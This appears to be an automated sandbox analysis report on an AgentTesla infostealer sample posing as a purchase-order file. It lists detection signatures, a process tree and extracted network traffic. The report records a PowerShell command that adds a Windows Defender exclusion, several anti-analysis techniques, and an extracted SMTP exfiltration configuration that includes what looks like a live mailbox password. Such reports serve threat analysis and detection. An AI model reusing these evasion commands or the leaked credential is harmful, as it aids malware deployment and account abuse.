Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 08042021New-PurchaseOrder.bat

Overview

General Information

Sample Name:08042021New-PurchaseOrder.bat (renamed file extension from bat to exe)
Analysis ID:383917
MD5:27233176a2a979195b01a53ec16c7631
SHA1:0ef424d2000f18e6b83473535bf85d22ed9ab79b
SHA256:397a62fc978f7a97a87caaf9c35e98e4a053de4e786beee73a6c1ac0e99c9fc9
Tags:AgentTeslabatYahoo
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • 08042021New-PurchaseOrder.exe (PID: 4952 cmdline: 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' MD5: 27233176A2A979195B01A53EC16C7631)
    • AdvancedRun.exe (PID: 4436 cmdline: 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 5744 cmdline: 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /SpecialRun 4101d8 4436 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 5828 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 3636 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 1928 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6284 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • WerFault.exe (PID: 6460 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 2784 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • SWqTT.exe (PID: 3064 cmdline: 'C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe' MD5: 27233176A2A979195B01A53EC16C7631)
    • AdvancedRun.exe (PID: 5204 cmdline: 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 5304 cmdline: 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /SpecialRun 4101d8 5204 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
  • SWqTT.exe (PID: 5192 cmdline: 'C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe' MD5: 27233176A2A979195B01A53EC16C7631)
    • AdvancedRun.exe (PID: 7116 cmdline: 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "fixer2015@yandex.ruChibuonyenze88880000smtp.yandex.ru"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000020.00000002.486317190.0000000006341000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000001.00000002.291099995.0000000003543000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000020.00000002.487748726.000000000645C000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        Process Memory Space: 08042021New-PurchaseOrder.exe PID: 4952JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: SWqTT.exe PID: 3064JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            32.2.SWqTT.exe.64915d0.5.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              1.2.08042021New-PurchaseOrder.exe.3543aa8.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                32.2.SWqTT.exe.64915d0.5.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  1.2.08042021New-PurchaseOrder.exe.3543aa8.3.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    1.2.08042021New-PurchaseOrder.exe.35790c8.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 1 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 32.2.SWqTT.exe.64915d0.5.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "fixer2015@yandex.ruChibuonyenze88880000smtp.yandex.ru"}
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeReversingLabs: Detection: 14%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: 08042021New-PurchaseOrder.exeReversingLabs: Detection: 14%
                      Source: unknownHTTPS traffic detected: 172.67.150.212:443 -> 192.168.2.3:49704 version: TLS 1.0
                      Source: 08042021New-PurchaseOrder.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: System.Core.ni.pdbRSDSD source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe, 00000005.00000000.233606021.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000023.00000000.377976496.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000025.00000000.411827266.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000026.00000000.421152625.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.34.dr
                      Source: Binary string: System.Xml.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb\F source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
                      Source: Binary string: System.ni.pdbRSDS source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Core.pdbZ source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Configuration.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: mscorlib.pdb853321935-2125563209-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32# source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303666174.00000000067D0000.00000004.00000001.sdmp
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: jVisualBasic.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: System.Configuration.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb-Q source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
                      Source: Binary string: System.Xml.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Core.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: jLC:\Windows\Microsoft.VisualBasic.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: System.Windows.Forms.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: O.pdb4( source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: mscorlib.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb5t source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302660548.0000000006764000.00000004.00000001.sdmp
                      Source: Binary string: System.Drawing.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Drawing.pdb9 source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: mscorlib.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: @sxC:\Users\user\Desktop\08042021New-PurchaseOrder.PDBO source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: ww08042021New-PurchaseOrder.PDB source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbu source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Core.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb0309D}\InProcServer32 source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303666174.00000000067D0000.00000004.00000001.sdmp
                      Source: Binary string: System.Xml.pdbD source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Windows.Forms.pdb04lk source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Xml.ni.pdbRSDS source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E349A863A698863617D7B55886FAE832.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cfConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-ADD8B69CFB72A4D5DBAFC5A0A255FA77.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cf
                      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5183A347C7BAD04E3424599E1B978F29.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cf
                      Source: Joe Sandbox ViewIP Address: 172.67.150.212 172.67.150.212
                      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: unknownHTTPS traffic detected: 172.67.150.212:443 -> 192.168.2.3:49704 version: TLS 1.0
                      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E349A863A698863617D7B55886FAE832.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cfConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-ADD8B69CFB72A4D5DBAFC5A0A255FA77.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cf
                      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5183A347C7BAD04E3424599E1B978F29.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cf
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.facebook.com (Facebook)
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.twitter.com (Twitter)
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: <meta property="og:site_name" content="Liverpool.com"><meta property="og:language" content="en"><meta property="og:type" content="article"><meta property="og:title" content="The Brewster Experience has underdelivered so far, but that will change"><meta property="og:url" content="https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763"><meta property="og:description" content="Rhian Brewster was hyped up before the start of the season, but was that fair?"><meta property="og:image" content="https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178657262.jpg"><meta property="og:section" content="Features"><meta property="article:tag" content="Rhian Brewster"><meta property="article:author" content="https://www.facebook.com/kristianwalsh1987/"><meta property="article:published_time" content="2019-10-30T16:00:00Z"><meta property="article:modified_time" content="2019-10-30T15:36:53Z"><meta property="article:expiration_time" content="2019-11-29T15:36:53Z"><meta property="article:section" content="Features"><meta property="article:id" content="liverpool-17172763"> equals www.facebook.com (Facebook)
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.facebook.com (Facebook)
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.twitter.com (Twitter)
